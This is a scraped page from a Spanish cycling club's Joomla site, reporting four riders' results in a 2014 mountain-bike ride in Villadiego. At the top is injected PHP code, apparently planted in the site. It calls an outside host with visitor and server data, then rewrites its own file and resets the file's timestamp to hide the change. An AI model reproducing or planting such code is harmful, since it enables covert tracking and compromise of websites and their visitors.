check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456731446){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=5&id=18776729&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_contact/models/content.php"); } El Portillo del Infierno 2014!!!

La Afición

Calendario

<<  Agosto 2017  >>
 Lu  Ma  Mi  Ju  Vi  Sa  Do 
   1  2  3  4  5  6
  7  8  910111213
14151617181920
21222324252627
28293031   
Banner
Banner
Banner
Banner

Acceso Privado Equipo



El Portillo del Infierno 2014!!! PDF Imprimir E-mail
Domingo, 03 de Agosto de 2014 21:29

El Domingo 27 de Julio, cuatro componentes del equipo de BBT del Club Deportivo Silos participaron en la XI MARCHA BTT “EL PORTILLO DEL INFIERNO”-GT BYCICLES, organizada por el Club Ciclista “Me Tomo las de Villadiego”, perteneciente a la IV edición del Circuito Provincial, 3 de ellos en el recorrido largo: Alex Puente, Andrés Álamo y Jesús Puente (57 km / 1000 m+) y el debut de César Cruces en una prueba de este tipo, en el recorrido corto (38 km / 600 m+).

 

La cita fue en la Plaza de Villadiego a las 9:30, con Álex y Andrés tomando posición en las primeras filas de la línea de salido y con Jesús y César algo más atrás.

El recorrido largo era bastante exigente con 1001 m de desnivel positivo acumulado, con 5 duras subidas y el mismo número de bajadas con cierto peligro, mientras que la ruta corta con 650 m de desnivel positivo acumulado constaba sólo de 2 duras subidas y dos bajadas peligrosas. Ambas discurrieron por caminos de tierra, varios caminos rocosos y de piedra y unas cuantas zonas de estrechos senderos.

Los dos recorridos fueron paralelos durante los primeros 16 km, donde el recorrido largo se desvió hacia la derecha camino de la “subida de Santa Marina” y el recorrido corto transcurrió hacia la izquierda camino del primer avituallamiento.

La salida en pelotón fue a lo largo de las estrechas calles de Villadiego, dirección la subida del Calvario, por cómodas pistas y poco a poco los corredores fueron tomando posiciones y el pelotón se fue estirando, rápidamente Álex y Andrés van acercándose a los corredores de cabeza, con Jesús en una posición cómoda en el medio, y más atrás César tomando contacto con este tipo de rutas. En el km 10 empieza la primera de las duras subidas: “La Lastra” que marca las diferencias entre los beteteros, la ascensión discurre por una cómoda pista aunque rompe piernas, hasta coronar el alto y proseguir por unas estrechas sendas llenas de piedra y roca al borde de un cortante, que nos llevan entre encinas hasta la primera de las bajadas serias, donde muchos de los corredores deciden bajarse de la bici ante el peligro que supone bajar en pelotón. Aquí los cuatro componentes del equipo van todos por separado y no se ven entre ellos, lo que ya desde el principio marcaría las posiciones y resultados de carrera.

Después de esta bajada, ambas rutas siguieron por cómodas y rápidas pistas con pequeñas subidas y bajadas hasta que se bifurcaron, yendo los tres componentes de la ruta larga por la subida “del Abarejo”.

Desafortunadamente Jesús tuvo un percance en el km 25 y sufrió una dolorosa caída que le causó un fuerte golpe en la rodilla que le hizo, no solo no abandonar, sino proseguir la carrera reenganchándose a la ruta corta como un duro bettetero que es y con más km de los que dicho recorrido tenía en origen.

César continuó por estrechas sendas con una ruta un poco rompe piernas y no muy marcada, lo que le hacía pensar que se había perdido (sensación que compartieron el resto de los participantes) y que no veía bikers ni por delante, ni por detrás, hacia la segunda gran subida: “La cuesta Cagalita” que le llevaría a una dura bajada por una estrecha senda flanqueada por pinos hacia el segundo avituallamiento en el que decide no parar al verse para su sorpresa cómodo y con fuerza para ir tirando por amplias pistas hacia la zona final del recorrido.

En este punto, Jesús ya se había reenganchado a la ruta corta y ya en línea de meta, César se lleva la gran sorpresa de ver que ya ha llegado y hablan del percance que le causó no poder acabar la ruta larga, pero si hacerlo con un brillante 9º puesto en la clasificación general de la ruta corta y un tiempo de 2:28:07.56 . Ambos esperan la llegada de sus otros dos compañeros mientras reciben un masaje que relaja sus piernas después del esfuerzo. Para César fue su primera participación en una ruta del Circuito Provincial y las sensaciones fueron muy positivas quedando en el puesto 18 de la clasificación general de la ruta corta, con un tiempo de 2:43:28.32.

Pasada menos de media hora vemos llegar a Álex con un magnifico puesto, 26º y un tiempo de 3:03:27.96, también después de haber sufrido una caída y un buen rasponazo en su brazo derecho, y poco después entraría el cuarto componente del equipo haciendo un gran tiempo de 3:36:28.14 y un 84º puesto.

Gran día de BTT en Villadiego con una magnifica organización, la primera vez que participan 4 componentes y sin duda una gran experiencia positiva para César que seguro volverá a repetir en sucesivas marchas.

 

¡¡¡ ARRIBA DEPORTIVO!!!

 

Escribir un comentario

Código de seguridad
Refescar

Banner
Banner

Colaboradores

Banner
Banner
Banner
Banner
Banner
Banner



By vicencid. Potenciado por Jommla!. Valid XHTML and CSS.